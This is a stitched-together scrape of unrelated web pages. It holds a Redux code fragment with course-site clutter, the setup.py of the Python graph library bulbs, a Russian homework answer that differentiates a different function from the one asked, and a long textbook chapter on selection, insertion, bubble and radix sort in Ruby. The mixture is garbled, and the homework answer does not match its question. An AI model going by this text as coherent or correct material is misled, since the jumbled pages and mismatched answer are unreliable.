“document.domain=’” + http.join(”") + “‘;” +
“”);
BTW: It wont work if you just use your testing environment, such as Visual Studio local web host, I had to test my work through real internet address.
Last thing, dont forget to change the thing as Tim suggested above.
Still I have one question of how to solve the problem when the user clicks STOP button on the browser; For IE with this htmlfile solution, it works perfect, but for other browsers the comet connection will be disconnected
16. Quora Says:
Is it possible to do iframe streaming in non-IE browsers without loading throb?…
Basically, iframe streaming works in all browsers (by have a hidden iframe to receive never ending “…..
17. Manh Le Says:
As far as I know Iframe streaming works in Chrome also. But for other browsers besides IE I would use XMLHttp Object, and use stage 3 to fetch the data from server.
My comet implementation for the client catches response pretty fast for XMLHTTP streaming, but very slow on Iframe Streaming (IE)/htmlfile for the first few message FLUSHES from the Server.
18. Simple PHP Comet example - JavaScript Joy Says:
[...] References: http://www.zeitoun.net/articles/comet_and_php/start http://cometdaily.com/2007/11/18/ie-activexhtmlfile-transport-part-ii/ [...]
19. Renato Elias Says:
Hi,
I’m reading your problem with gc, and thinking if your use with return stament ?
function connect_htmlfile(url, callback) {
// no more ‘var transferDoc…’
var transferDoc = new ActiveXObject(”htmlfile”);
transferDoc.open();
transferDoc.write(
“” +
“document.domain=’” + document.domain + “‘;” +
“”);
transferDoc.close();
var ifrDiv = transferDoc.createElement(”div”);
transferDoc.body.appendChild(ifrDiv);
ifrDiv.innerHTML = “”;
transferDoc.callback = callback;
return transferDoc;
}
var channel = connect_htmlfile(’/xxx/’ , function(data) {
});
and use anything ping in connect
setInterval((function(channel) {
//ping channel
return channel;
})(channel) , 1000);
Leave a Reply
Copyright 2015 Comet Daily, LLC. All Rights Reserved
|
__label__pos
| 0.635087 |
0
I'm working in C++14 and trying to figure out a way to put two classes (with the same name) inside the same header file. In this scenario one class would always be ignored as a result of something happening in main.cpp during runtime. Here's an example of this header file:
// First class:
class foo
{
public:
foo();
private:
int var;
};
foo::foo()
{
var = 1;
}
// Second class:
class foo
{
public:
foo();
private:
int var;
};
foo::foo()
{
var = 2;
}
So let's say during runtime the user entered "1". Then the first definition of class foo would be used, and the compiler would ignore the second class. But then if the user enters "2", the first class is ignored and the second class is used.
I know it's ugly, but in my specific case it saves a ton of work.
• You cannot do this. You need to learn about inheritance and polymorphism. – GrandmasterB Dec 27 '18 at 21:12
• 2
Either you need a time machine in order for the runtime to affect the compilation process or you are not being clear what you exactly want to do. – Peter M Dec 27 '18 at 21:15
• @Peter M Do you mean a logical or bitwise or? – Inertial Ignorance Dec 27 '18 at 21:35
• I meant a Logical Or – Peter M Dec 27 '18 at 23:03
• 1
I guess what you are really after is "foo" as an abstract base class of two other classes "foo1" and "foo2", and a factory method which creates either objects of type "foo1" or "foo2", which are then used as "foo" objects throughout the rest of the program. This approach has a name, it is called Strategy pattern. – Doc Brown Dec 28 '18 at 0:06
1
Technically, it's possible
You can give two different classes the same name, by putting each class in separate namespaces:
namespace space_1 {
class foo { ... };
}
namespace space_2 {
class foo { ... };
}
This defines two different and unrelated classes: space_1::foo and space_2::foo.
You may then define at compile time which namespace to use in the using context (in main(), or in a configuration header):
int main() {
using namespace space_1;
foo a;
}
If you want to choose either the one or the other at run time, you'll have to either use explicit scope resolution, or use the class and the defined object in a limited scope using a namespace:
if (a) {
using namespace space_1;
foo f;
// do smething with f HERE
}
else {
using namespace space_2;
foo f;
// do something else with f HERE
}
But does it make sense ?
Using different namespaces for classes with the same name is typically used for managing compile-time library dependencies, for example:
• avoiding name conflicts between different components.
• new version of a library with a different interface.
• choice of alternative libraries (e.g. boost::xxx vs. std::xxx).
It is a very bad idea to use this construct for a different purpose, such as choosing the class implementations at runtime.
Is there a better design ?
If you have a class with a well defined API, but need to cope with different variants/implementations at run time, you may consider polymorphism:
• Make foo an abstract base class, and create a derived class for every needed variant.
• Use a factory to instantiate the objects with the right derived class.
Alternatively, you may redesign your foo class, so that it requires a parameter in the constructor (i.e. the initial value of var in your case) or inject a strategy in the constructor.
• I was under the impression that #define is only typed once at the start of a program. There's a way to use #define on two namespaces throughout a program to switch back and forth between their respective classes? – Inertial Ignorance Dec 27 '18 at 21:38
• I'm actually already doing what you coded (using different namespaces for my classes). It's worked well so far since I only ever use two classes at the same time. Now though I want to use 10+ of these classes, which would require 10 different namespaces. That would mean I have 10 different kinds of pointers/objects, requiring 10 different (essentially identical) functions for operating on each kind of pointer. I was hoping to get around this somehow. – Inertial Ignorance Dec 27 '18 at 21:43
• 1
Yeah an abstract class is probably the best way to go, not sure why I didn't give it much thought. It would allow me to write functions acting on the same type for all 10 different objects. Thx! – Inertial Ignorance Dec 27 '18 at 21:53
• 1
The question was "one class would always be ignored as a result of something happening in main.cpp during runtime" - but what you are showing above is a compile time decision, not a runtime decision. So either OP (in accepting your answer) did not understand what they were asking for, or they did not understand what your answer is about, or I did not understand something here. – Doc Brown Dec 27 '18 at 23:53
• 1
@Christophe: I think it would be better if you edit your answer in a way other readers are not forced to scan through all the comments to understand why you did not answer the literal question, as it is written. – Doc Brown Dec 28 '18 at 0:59
Your Answer
By clicking "Post Your Answer", you agree to our terms of service, privacy policy and cookie policy
Not the answer you're looking for? Browse other questions tagged or ask your own question.
|
__label__pos
| 0.988457 |
Web Content Management Software
OVERVIEW In the expansive expanse of the internet, Web Content Management Software (WCMS) emerges as an essential enabler for creating, managing, and publishing digital content. This sophisticated software simplifies the complex process of web development and allows individuals and businesses to maintain an up-to-date and engaging online presence without needing extensive technical expertise. WHO USES […]
|
__label__pos
| 0.958594 |
How to find the min, max and mean values of 34 timetables stored in a 1 x 34 cell and add them as extra columns to the respective timetables?
19 views (last 30 days)
I have 34 CSV files that each consist of N rows and 3 columns. My code loops through one CSV file at a time (storing them in a 1 x 34 cell) and firstly converts them into a N x 2 timetable, TT{jj}. I then filter this timetable by a timerange (the difference between two dates and times in format dd/MM/uuuu HH:mm) to leave all the values within that timerange which is stored in TT2{jj}. The timetables have 2 columns (date and time, temperature).
I now want to know how to find the min, max and mean values of the temperature column for each timetable and how to add these values to the original timetable to create a N x 5 timetable (date and time, temperature, min temp, max temp, mean temp) which would look like this:
e.g. for jj=1, the final table would look like:
Date/Time Temperature Min Max Mean
21/02/2020 08:00 20 16 20 18.25
21/02/2020 08:03 16
21/02/2020 08:06 18
21/02/2020 08:09 19
etc etc
Then it would loop again for jj=2 etc
The loop to create TT2{jj} is:
for jj = 1:34
thisfile{jj} = files{jj}.name; % creates a cell containing each CSV file name in directory
T{jj} = readtable(thisfile{jj},'Headerlines',19,'ReadVariableNames',true); % converts CSV to timetable ignoring rows 1-19
TT{jj} = table2timetable(T{jj}(:,[1 3])); % convert table to timetable and ignore column 2
TT2{jj} = TT{jj}(TR,:); % creates timetable containing all rows found within timerange TR
end
At the end of the loop (above) I export the 34 tables to one spreadsheet that has 34 tabs.
I have no idea how to proceed so any help would be appreciated.
Answers (3)
Sindar
Sindar on 30 Apr 2020
Is this what you want to do:
• Load in a given table (say jj=1)
• create TT2{1}
• find the min of TT{1}.temperature
• add a third column to TT{1} containing this min in every row
• repeat for mean, max
• repeat for TT{2:34}
If so, then:
for jj = 1:34
thisfile{jj} = files{jj}.name; % creates a cell containing each CSV file name in directory
T{jj} = readtable(thisfile{jj},'Headerlines',19,'ReadVariableNames',true); % converts CSV to timetable ignoring rows 1-19
TT{jj} = table2timetable(T{jj}(:,[1 3])); % convert table to timetable and ignore column 2
TT2{jj} = TT{jj}(TR,:); % creates timetable containing all rows found within timerange TR
TT2{jj}.min_T=repelem(min(TT2{jj}{:,2}), size(TT2{jj},1), 1);
TT2{jj}.max_T=repelem(max(TT2{jj}{:,2}), size(TT2{jj},1), 1);
TT2{jj}.mean_T=repelem(mean(TT2{jj}{:,2}), size(TT2{jj},1), 1);
end
If you want to modify T (or likewise TT):
...
T{jj}.min_T=repelem(min(TT2{jj}{:,2}), size(T{jj},1), 1);
...
4 Comments
Sindar
Sindar on 13 May 2020
Edited: Sindar on 13 May 2020
Reading the updated question, I see you want the data in different sheets of the same xls file. This sort of syntax will work for whichever method
writetimetable(TT2{jj},"table.xls",'Sheet',jj)
Sign in to comment.
Guillaume
Guillaume on 1 May 2020
The simplest thing would be to add one column to each timetable to indicate the timetable of origin, then concatenate all these timetables into one timetable. Then with just one call to groupsummary, you can get your desired output.
However, if you get the mean, min and max for each timetable, so get one scalar value for each stat per timetable, I'm a bit unclear why you still want to store a datetime. Doesn't it become meaningless?
Anyway:
TT = cell(size(files));
for fileidx = 1:numel(files)
t = readtable(files(fileidx).name, 'Headerlines', 19, 'ReadVariableNames', true);
TT{fileidx} = table2timetable(t(:, [1, 3]))
TT{fileidx}.FileIndex(:) = fileidx; %add column with file number
end
alltimetables = vertcat(TT{:}); %concatenate all in one timetable
alltimetables = alltimetables(TR, :); %keep only desired timerange
ttstats = groupsummary(alltimetables, 'FileIndex', {'mean', 'min', 'max'}) %get mean min max for each FileIndex
Note that if you're using sufficiently recent version of matlab I'd replace the loop by:
TT = cell(size(files));
opts = detectImportOptions(files(1).name, 'NumHeaderLines', 19, 'ReadVariableNames', true);
opts.SelectedVariableNames = [1, 3]; %don't bother reading 2nd column
for fileidx = 1:numel(files)
TT{fileidx} = readtimetable(files(fileidx).name, opts);
TT{fileidx}.FileIndex(:) = fileidx; %add column with file number
end
%rest of code stays the same
1 Comment
Karl Dilkington
Karl Dilkington on 13 May 2020
Thanks for your answer. I've amended my question to include a bit more detail and clarity on exactly what I need. At the end of my loop I export all 34 timetables to a spreadsheet with 34 tabs so I still need the date/time. I want the min, max and mean values so I don't have to do it manually for each timetable/tab in Excel.
I'm assuming the code to replace the loop is more efficient than what I have?
Thanks for your help.
Sign in to comment.
Peter Perkins
Peter Perkins on 5 May 2020
As others have said, it seems to make little sense to create new variables in each timetable, each of which are a column vector of a constant. Maybe you want something like the following.
First, make something like your data:
n = 3;
tt_list = cell(n,1);
for i = 1:3
X = rand(5,1);
Time = datetime(2020,5,i)+days(rand(5,1));
tt_list{i} = timetable(Time,X);
end
Now get the stats for each timetable, and put those in a table that also includes your cell array of timetables:
t = table(tt_list,zeros(n,1),zeros(n,1),zeros(n,1),'VariableNames',["Data" "Mean" "Min" "Max"]);
for i = 1:n
t.Mean(i) = mean(tt_list{i}.X);
t.Min(i) = min(tt_list{i}.X);
t.Max(i) = max(tt_list{i}.X);
end
From that, you end up with
>> t
t =
3×4 table
Data Mean Min Max
_______________ _______ _______ _______
{5×1 timetable} 0.67375 0.4607 0.94475
{5×1 timetable} 0.56289 0.15039 0.9865
{5×1 timetable} 0.52956 0.26661 0.91785
That's the brute force way. As Guillaume suggests, you might find it convenient to put all your timetables in one longer one. The following gets you essentially yhe same table as above.
tt = vertcat(tt_list{:});
tt.Source = repelem(1:n,5)';
fun = @(x) deal(mean(x),min(x),max(x));
t = rowfun(fun,tt,'GroupingVariable','Source','NumOutputs',3, ...
'OutputFormat','table','OutputVariableNames',["Mean" "Min" "Max"])
>> t =
3×5 table
Source GroupCount Mean Min Max
______ __________ _______ _______ _______
1 5 0.67375 0.4607 0.94475
2 5 0.56289 0.15039 0.9865
3 5 0.52956 0.26661 0.91785
I used rowfun; splitapply or groupsummary would also work.
1 Comment
Karl Dilkington
Karl Dilkington on 13 May 2020
Thanks for your answer. I've amended my question to include a bit more detail and clarity on exactly what I need. At the end of my loop I export all 34 timetables to a spreadsheet with 34 tabs so I still need the date/time. I want the min, max and mean values so I don't have to do it manually for each timetable/tab in Excel.
Thanks for your help.
Sign in to comment.
Community Treasure Hunt
Find the treasures in MATLAB Central and discover how the community can help you!
Start Hunting!
|
__label__pos
| 0.958398 |
1. Determine the decimal value of the following 8-bit 2's complement numbers.
(a) 11111011
(b) 00110111
(c) 11100011
2. Perform the following addition or subtraction of the given numbers using 8-bit 2's complement representation of the numbers. Parts (a) and (b) are given in decimal, while parts (c)-(e) are given in 8-bit 2's complement. Indicate in each case whether overflow occurs.
(a) (-65)+(+72)
(b) (-65)-(+72)
(c) 01101100-01010011
(d) 01101100+01010011
(e) 11100011+11111001
Answers
|
__label__pos
| 0.995117 |
User Rating: 5 / 5
Star ActiveStar ActiveStar ActiveStar ActiveStar Active
Using Domoticz it's possible to supply a router through the normally-closed relay output (SPDT relay); so, normally power supply is applied to the router, but if internet connection goes down, after some seconds or minutes Domoticz remove the power supply, wait for 10s, and apply power supply again to restart the router.
Script that automatically reset the router when internet connection goes down
This monitoring procedure is performed by a bash script that sends pings to two different hosts, and if they do not respond, after some seconds or minutes, sends a command to Domoticz to activate the relay output that remove power supply to the router.
First, check that 127.0.0.1 (and your network, if you prefer) are specified in the Domoticz panel Setup -> Settings -> Local Networks: in this way any connection to domoticz from the specified networks do not need authentication (no username and password is required). If you add your LAN, all devices from your LAN can enter domoticz without asking for username and password.
domoticz setup settings localnetworks
To install the bash script, copy and paste the following code into the raspberry/linux shell:
1. #become root
2. sudo su
3. #download script
4. if [ `which wget` ]; then
5. wget -O /usr/local/sbin/netwatchdog.sh http://docs.creasol.it/netwatchdog.sh
6. elif [ `which curl` ]; then
7. curl -o /usr/local/sbin/netwatchdog.sh http://docs.creasol.it/netwatchdog.sh
8. else
9. #wget and curl not installed: install now
10. apt install wget curl
11. wget -O /usr/local/sbin/netwatchdog.sh http://docs.creasol.it/netwatchdog.sh
12. fi
13. chmod 755 /usr/local/sbin/netwatchdog.sh
14. # prepare /etc/rc.local so it is sufficient to remove a # to let raspberry start the script at boot time
15. sed -i 's:^exit 0:#/usr/local/sbin/netwatchdog.sh >/dev/null 2>/dev/null \&\nexit 0:' /etc/rc.local
16. sed -i 's/amp;//' /etc/rc.local
Now, find the idx corresponding to the relay output: open the web browser to the Domoticz page, go to Setup -> Devices to list all installed devices. Look in the idx column to find the idx of the router power supply device.
How to find idx of a device
Now, copy&paste the following commands in the raspberry shell to put the script in debug mode (variable DEBUG=1 : in this way the script will print several debugging messages on the console and reduce the timings to check the script easily), edit the script (you have to write the right idx in the variable ROUTER_RELAY_IDX, check other variables, and type ctrl+x to exit):
1. #set DEBUG=1 in /usr/local/sbin/netwatchdog.sh
2. sed -i 's/^DEBUG=0\(.*\)/DEBUG=1\1/' /usr/local/sbin/netwatchdog.sh
3. #edit script
4. nano /usr/local/sbin/netwatchdog.sh
and finally start the script in debug mode (reset the router after only 20s of ping failures), writing some information in the console and other information in the logfile:
/usr/local/sbin/netwatchdog.sh
Remove the internet cable or switch-off the router: you should see that ping returns 100% packet loss and after 20s the script send a command to Domoticz to reset the router. Type ctrl+c to terminate the script.
If it works, type the following commands to edit /usr/local/sbin/netwatchdog.sh setting DEBUG=0 and to modify /etc/rc.local so the script is executed at boot time:
1. #set DEBUG=0 in /usr/local/sbin/netwatchdog.sh
2. sed -i 's/^DEBUG=1\(.*\)/DEBUG=0\1/' /usr/local/sbin/netwatchdog.sh
3. #and now let linux starting the script
4. sed -i 's:^#/usr/local/sbin/netwatchdog.sh:/usr/local/sbin/netwatchdog.sh:' /etc/rc.local
Now you have to reboot to let linux start the netwatchdog.sh script.
Good luck.
Pin It
product_id=137
|
__label__pos
| 0.970482 |
How to Check Twitch Chat Logs?
Curious to know more about Twitch chat longs? Well, we have got your back. Twitch chats are the versions of Twitch’s direct message, and one of them is Chat logs. People who view your streams will be able to send you text messages, and only you will be able to view them with Chat Logs’ help.
How to check Twitch Chat Logs
Now it will be up to you to make them public while you stream or not. Many streamers choose to show them to the public to increase their engagement. While streaming many times, it becomes difficult for the streamer to check all the chats that the people are sending through. With the help of chat logs, you will be able to look it up later.
So we have prepared a short post to explain how you can access Twitch Chat logs and why Twitch Chat logs are essential for your channel.
How to Check Twitch Chat Logs?
Step #1: Log into your Twitch account by clicking here and navigate towards the right side of the screen, where you will find Channel Options.
Login to Twitch
Step #2: Here in this step, you need to click on Channel Option.
Click on channel option
Step #3: Now navigate to Chats, and a new window will open, and this will show you the chat logs of your account.
Navigate to Chat
Why Should You Care About Your Twitch Chat Logs?
• Feedback: You will be able to know how people are engaging with your content. Whether or not they can reciprocate. Many times people will give out free suggestions to improve your content and help you. They can also keep you up to date with the newest trends that other streamers are following.
• Monitoring your comments: You will be able to flag any messages which are harming your channel. Always allow for constructive criticism, but there will be some people whose comments might infuriate you. Or there might be some inappropriate comments not right for the age of people that you are targeting. In these cases, you should flag these comments or have a chat with the person responsible.
• Content-engagement: By the number of chat logs, you will decide whether or not your content is reaching the masses. Whether the viewership is increasing or decreasing in number. Content -engagement is a vital part of your twitch streaming carrier.
Frequently Asked Questions
Can I see my twitch chat history?
If you’re a streamer or a mod of a streamer, then you can easily check Twitch chat logs. If not, then there is no way for viewers to see their twitch chat history.
Are twitch chats saved?
Yes, Twitch chats are saved. If you’re watching an archived stream, then you can see the old chat running in the chat section. This feature is similar to YouTube.
How do you retrieve deleted twitch messages?
If you’re a Twitch streamer, then you have to enable the option of seeing deleted messages in the chat section. Or your Mod can do it, and then you will be able to see deleted messages as well.
How do I see who is chatting on Twitch?
You can see the viewers count on the screen, which displays how many users are active on your channel at that time. But it doesn’t quite show how many of them are chatting right now. You can’t get the exact number.
Conclusion:
To conclude, Twitch chat logs are essential if you want to gain the perspective of the viewers. This will significantly impact the quality of the streams and gain more followers. We hope you liked our short and simple post on Twitch Chat Logs. If yes, then drop your thoughts in the comment section or any questions regarding the same, feel free to post them in the comment section below.
You may also like:
|
__label__pos
| 0.939797 |
lout-users
[Top][All Lists]
Advanced
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Alignment problem
From: Thomas Baruchel
Subject: Alignment problem
Date: Fri, 30 May 2003 19:59:51 +0200
User-agent: Mutt/1.2.5i
Brest, le vendredi 30 mai
Hi,
I don't understand how I can do that, because the concept of row mark
still is unfamiliar to me.
I have two objects on my line:
the first one is a "cline @Break" object with my name, etc.
Thomas Baruchel
15 rue Fréminville
29200 Brest
Phone: 999999
email : address@hidden
What I want is to have at the right of this "object", a word in a big size,
with a baseline being the same as the baseline of the email (which is the
last line of the left "object"). This word will be made with two components:
the initial capital, very big, with the same height as the whole
cline @Break described above, and the rest of the word, big but not as
big as the initial capital. A little like that (ascii art):
Thomas Baruchel | |
15 rue Fréminville | | _ _
29200 Brest +------+ ___| | | ___
| | / _ \ | |/ _ \
Phone: 999999 | | | __/ | | (_) |
email : address@hidden | | \___|_|_|\___/
I can't handle it with the 'row mark' notion, because this row mark
doesn't even seem to be the baseline of a word.
How could I do that ?
I don't ask how to compute the size of the capital, because I can put
it empirically, bt would be happy if there is a way to compute it. What
I really want is the perfect baseline alignment for:
'email', 'H' and 'ello'
Cordially,
P.-S. --- My initial (not working) code is:
clines @Break {Light 12p} @Font {
Thomas Baruchel
15 rue Fréminville
address@hidden Brest
/10p 11.25p @Font {Tél. address@hidden@address@hidden@Wide{}74}
/4p 9p @Font address@hidden
} |16p {Light 72p} @Font {H}
reply via email to
[Prev in Thread] Current Thread [Next in Thread]
|
__label__pos
| 0.942273 |
View source | Discuss this page | Page history | Printable version
Toolbox
Main Page
Upload file
What links here
Recent changes
Help
PDF Books
Add page
Show collection (0 pages)
Collections help
Search
ERP/3.0/Developers Guide/Reference/Entity Model/CountryTrl
This article is protected against manual editing because it is automatically generated from Openbravo meta-data. Learn more about writing and translating such documents.
Back button.png Back to ERP/3.0/Developers_Guide/Reference/Entity_Model#CountryTrl
CountryTrl
Translation
To the database table (C_Country_Trl) of this entity.
Properties
Note:
Property Column Constraints Type Description
id* C_Country_Trl_ID Mandatory
Max Length: 32
java.lang.String
country C_Country_ID Mandatory
Country The Country defines a Country. Each Country must be defined before it can be used in any document.
language AD_Language Mandatory
ADLanguage The Language identifies the language to use for display
client AD_Client_ID Mandatory
ADClient A Client is a company or a legal entity. You cannot share data between Clients.
organization AD_Org_ID Mandatory
Organization An organization is a unit of your client or legal entity - examples are store, department. You can share data between organizations.
active IsActive Mandatory
java.lang.Boolean There are two methods of making records unavailable in the system: One is to delete the record, the other is to de-activate the record. A de-activated record is not available for selection, but available for reporting. There are two reasons for de-activating and not deleting records:
(1) The system requires the record for auditing purposes. (2) The record is referenced by other records. E.g., you cannot delete a Business Partner, if there are existing invoices for it. By de-activating the Business Partner you prevent it from being used in future transactions.
creationDate Created Mandatory
java.util.Date The Created field indicates the date that this record was created.
createdBy CreatedBy Mandatory
ADUser The Created By field indicates the user who created this record.
updated Updated Mandatory
java.util.Date The Updated field indicates the date that this record was updated.
updatedBy UpdatedBy Mandatory
ADUser The Updated By field indicates the user who updated this record.
translation IsTranslated Mandatory
java.lang.Boolean The Translated checkbox indicates if this column is translated.
name# Name Mandatory
Max Length: 60
java.lang.String A more descriptive identifier (that does need to be unique) of a record/document that is used as a default search option along with the search key (that is unique and mostly shorter). It is up to 60 characters in length.
description Description Max Length: 255
java.lang.String A description is limited to 255 characters.
regionName RegionName Max Length: 60
java.lang.String The Region Name defines the name that will print when this region is used in a document.
addressPrintFormat DisplaySequence Mandatory
Max Length: 20
java.lang.String The Address Print format defines the format to be used when this address prints. The following notations are used: @C@=City @P@=Postal @A@=PostalAdd @R@=Region
Java Entity Class
/*
*************************************************************************
* The contents of this file are subject to the Openbravo Public License
* Version 1.1 (the "License"), being the Mozilla Public License
* Version 1.1 with a permitted attribution clause; you may not use this
* file except in compliance with the License. You may obtain a copy of
* the License at http://www.openbravo.com/legal/license.html
* Software distributed under the License is distributed on an "AS IS"
* basis, WITHOUT WARRANTY OF ANY KIND, either express or implied. See the
* License for the specific language governing rights and limitations
* under the License.
* The Original Code is Openbravo ERP.
* The Initial Developer of the Original Code is Openbravo SLU
* All portions are Copyright (C) 2008-2014 Openbravo SLU
* All Rights Reserved.
* Contributor(s): ______________________________________.
************************************************************************
*/
package org.openbravo.model.common.geography;
import java.util.Date;
import org.openbravo.base.structure.ActiveEnabled;
import org.openbravo.base.structure.BaseOBObject;
import org.openbravo.base.structure.ClientEnabled;
import org.openbravo.base.structure.OrganizationEnabled;
import org.openbravo.base.structure.Traceable;
import org.openbravo.model.ad.access.User;
import org.openbravo.model.ad.system.Client;
import org.openbravo.model.ad.system.Language;
import org.openbravo.model.common.enterprise.Organization;
/**
* Entity class for entity CountryTrl (stored in table C_Country_Trl).
*
* NOTE: This class should not be instantiated directly. To instantiate this
* class the {@link org.openbravo.base.provider.OBProvider} should be used.
*/
public class CountryTrl extends BaseOBObject implements Traceable, ClientEnabled, OrganizationEnabled, ActiveEnabled {
private static final long serialVersionUID = 1L;
public static final String TABLE_NAME = "C_Country_Trl";
public static final String ENTITY_NAME = "CountryTrl";
public static final String PROPERTY_ID = "id";
public static final String PROPERTY_COUNTRY = "country";
public static final String PROPERTY_LANGUAGE = "language";
public static final String PROPERTY_CLIENT = "client";
public static final String PROPERTY_ORGANIZATION = "organization";
public static final String PROPERTY_ACTIVE = "active";
public static final String PROPERTY_CREATIONDATE = "creationDate";
public static final String PROPERTY_CREATEDBY = "createdBy";
public static final String PROPERTY_UPDATED = "updated";
public static final String PROPERTY_UPDATEDBY = "updatedBy";
public static final String PROPERTY_TRANSLATION = "translation";
public static final String PROPERTY_NAME = "name";
public static final String PROPERTY_DESCRIPTION = "description";
public static final String PROPERTY_REGIONNAME = "regionName";
public static final String PROPERTY_ADDRESSPRINTFORMAT = "addressPrintFormat";
public CountryTrl() {
setDefaultValue(PROPERTY_ACTIVE, true);
setDefaultValue(PROPERTY_TRANSLATION, false);
}
@Override
public String getEntityName() {
return ENTITY_NAME;
}
public String getId() {
return (String) get(PROPERTY_ID);
}
public void setId(String id) {
set(PROPERTY_ID, id);
}
public Country getCountry() {
return (Country) get(PROPERTY_COUNTRY);
}
public void setCountry(Country country) {
set(PROPERTY_COUNTRY, country);
}
public Language getLanguage() {
return (Language) get(PROPERTY_LANGUAGE);
}
public void setLanguage(Language language) {
set(PROPERTY_LANGUAGE, language);
}
public Client getClient() {
return (Client) get(PROPERTY_CLIENT);
}
public void setClient(Client client) {
set(PROPERTY_CLIENT, client);
}
public Organization getOrganization() {
return (Organization) get(PROPERTY_ORGANIZATION);
}
public void setOrganization(Organization organization) {
set(PROPERTY_ORGANIZATION, organization);
}
public Boolean isActive() {
return (Boolean) get(PROPERTY_ACTIVE);
}
public void setActive(Boolean active) {
set(PROPERTY_ACTIVE, active);
}
public Date getCreationDate() {
return (Date) get(PROPERTY_CREATIONDATE);
}
public void setCreationDate(Date creationDate) {
set(PROPERTY_CREATIONDATE, creationDate);
}
public User getCreatedBy() {
return (User) get(PROPERTY_CREATEDBY);
}
public void setCreatedBy(User createdBy) {
set(PROPERTY_CREATEDBY, createdBy);
}
public Date getUpdated() {
return (Date) get(PROPERTY_UPDATED);
}
public void setUpdated(Date updated) {
set(PROPERTY_UPDATED, updated);
}
public User getUpdatedBy() {
return (User) get(PROPERTY_UPDATEDBY);
}
public void setUpdatedBy(User updatedBy) {
set(PROPERTY_UPDATEDBY, updatedBy);
}
public Boolean isTranslation() {
return (Boolean) get(PROPERTY_TRANSLATION);
}
public void setTranslation(Boolean translation) {
set(PROPERTY_TRANSLATION, translation);
}
public String getName() {
return (String) get(PROPERTY_NAME);
}
public void setName(String name) {
set(PROPERTY_NAME, name);
}
public String getDescription() {
return (String) get(PROPERTY_DESCRIPTION);
}
public void setDescription(String description) {
set(PROPERTY_DESCRIPTION, description);
}
public String getRegionName() {
return (String) get(PROPERTY_REGIONNAME);
}
public void setRegionName(String regionName) {
set(PROPERTY_REGIONNAME, regionName);
}
public String getAddressPrintFormat() {
return (String) get(PROPERTY_ADDRESSPRINTFORMAT);
}
public void setAddressPrintFormat(String addressPrintFormat) {
set(PROPERTY_ADDRESSPRINTFORMAT, addressPrintFormat);
}
}
Retrieved from "http://wiki.openbravo.com/wiki/ERP/3.0/Developers_Guide/Reference/Entity_Model/CountryTrl"
This page has been accessed 1,014 times. This page was last modified on 5 August 2014, at 13:52. Content is available under Creative Commons Attribution-ShareAlike 2.5 Spain License.
|
__label__pos
| 0.858917 |
AnsweredAssumed Answered
Is "DMEM_KERNEL_NUM" Missing When S32v234 DS2.0 Generates APU_XXX__MKDBStub?
Question asked by Brilly Wu on Jun 11, 2018
In the NXP\S32DS_Vision_v2.0\S32DS\s32v234_sdk\libs\apex\common\include\apu_microkernel.h file, two external variables are defined:
Extern volatile int32_t DMEM_KERNEL_NUM[] __attribute__ ((section (".DMEM_KERNEL_NUM")));
Extern volatile KERNEL_INFO DMEM_KERNEL_DB[] __attribute__ ((section (".DMEM_KERNEL_DB")));
In the DS2.0 compilation process, the generated file: 01workspace\DS_workspace\xxxAPU_gen\src\APU_xxx__MKDBstub.cpp, has only variables:
Volatile KERNEL_INFO DMEM_KERNEL_DB[2] =
{
{(int32_t)(&APU_XXX), "APU_XXX"},
{0xFFFFFFFF, ""}
};
DMEM_KERNEL_NUM is not defined.
Also, the Load.h file generated when DS2.0 compiles:
Const SEG_HOST_TYPE APU_WGH_LOAD_SEGMENTS[5][4] =
{
{0, (SEG_HOST_TYPE)(&APU_WGH_LOAD_PMEM[ 0]), 0x00000000, 16192 },
{ 1, (SEG_HOST_TYPE)(&APU_WGH_LOAD_DMEM[ 0]), 0x00000600, 8752 },
{ 1, (SEG_HOST_TYPE)(&APU_WGH_LOAD_DMEM[2188]), 0x00010800, 68 },
{ 2, 0, 0x00000100, 256 },
{ -1, 0, 0, 0 },
};
Display db section content length 68.
It is exactly the length of DMEM_KERNEL_DB[2]+4 kernel kernels
The resulting load.h,
Const SEG_MEM_TYPE APU_WGH_LOAD_DMEM[ 2208] =
{
......
0x00000007U, 0x0000000DU, 0x5F555041U, 0x00484757U, // (2188) 00010800
0x00000000U, 0x00000000U, 0x00000000U, 0x00000000U, // ( 2192) 00010810
0x00000000U, 0xFFFFFFFFU, 0x00000000U, 0x00000000U, // (2196) 00010820
0x00000000U, 0x00000000U, 0x00000000U, 0x00000000U, // (2200) 00010830
0x00000000U, 0x00000000U, 0x00000000U, 0x00000000U, // (2204) 00010840
}
The first number is 7, which means there are 7 kernels. However, there are actually only two.
One address is at 0x0000000DU and one address is at 0xFFFFFFFFU.
In the file:
NXP\S32DS_Vision_v2.0\S32DS\s32v234_sdk\libs\apex\acf\src\kernel_manager_host.cpp,
This function will cause memory access to cross boundaries:
Int KernelManager::InitLoadKernelDB( int /*apuid*/, const LOAD_SEGMENT_t* seg_addr)
{
......
Memcpy(mkernel_list, (KERNEL_INFO*)(&(src_ptr[1])), sizeof(KERNEL_INFO)* kn);
}
Outcomes
|
__label__pos
| 0.875709 |
剧场模式
首页前端Redux轻松学 Redux-Saga 视频教程
轻松学 Redux-Saga #3 Redux-Saga 的安装和输写第一个 Saga
求知小风 · 真仙发布于
5
src/index.js
import React from 'react';
import ReactDOM from 'react-dom';
import './index.css';
import App from './App';
import registerServiceWorker from './registerServiceWorker';
import { createStore, applyMiddleware } from 'redux';
import rootReducer from './reducers';
import { composeWithDevTools } from 'redux-devtools-extension';
import createSagaMiddleware from 'redux-saga';
import { Provider } from 'react-redux';
import { helloSaga } from './sagas';
const sagaMiddleware = createSagaMiddleware();
const store = createStore(
rootReducer,
composeWithDevTools(
applyMiddleware(sagaMiddleware)
)
);
sagaMiddleware.run(helloSaga);
ReactDOM.render(
<Provider store={ store }>
<App />
</Provider>,
document.getElementById('root')
);
registerServiceWorker();
src/app.js
import React, { Component } from 'react';
import logo from './logo.svg';
import './App.css';
import { connect } from 'react-redux';
import { increment } from './actions/counter';
class App extends Component {
render() {
return (
<div className="App">
<header className="App-header">
<img src={logo} className="App-logo" alt="logo" />
<h1 className="App-title">Welcome to React</h1>
</header>
<p className="App-intro">
{ this.props.counter }
</p>
<p>
<button onClick={ this.props.increment }>+</button>
</p>
</div>
);
}
}
const mapStateToProps = (state) => {
return {
counter: state.counter
};
};
export default connect(mapStateToProps, { increment })(App);
src/reducers/counter.js
import { INCREMENT } from '../constants/counter';
const counter = (state = 1, action = {}) => {
switch(action.type) {
case INCREMENT:
